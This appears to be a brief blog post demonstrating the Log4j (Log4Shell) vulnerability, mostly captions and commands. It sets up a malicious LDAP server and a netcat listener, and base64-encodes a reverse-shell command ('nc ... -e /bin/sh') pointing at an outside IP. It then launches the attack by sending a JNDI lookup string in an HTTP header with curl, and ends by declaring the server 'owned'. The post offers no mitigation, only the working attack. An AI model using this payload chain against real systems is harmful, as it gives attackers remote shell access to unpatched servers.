Log4j Demonstration

vulnerable server
vulnerable server
malicious ldap server
malicious ldap server
listening for remote shell
netcat listener
ldap://127.0.0.1:1389/Basic/Command/Base64/[base64_encoded_cmd]
nc 3.86.225.135 4444 -e /bin/sh
base64 encode the remote shell command
curl 52.23.211.253:8080 -H 'X-Api-Version: ${jndi:ldap://3.86.225.135:1389/Basic/Command/Base64/bmMgMy44Ni4yMjUuMTM1IDQ0NDQgLWUgL2Jpbi9zaA==}' 
launching the attack
launching the attack
errors the vulnerable server
command received
received the command
profit
Profit! the server is owned.
ref: https://www.lunasec.io/docs/blog/log4j-zero-day/

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store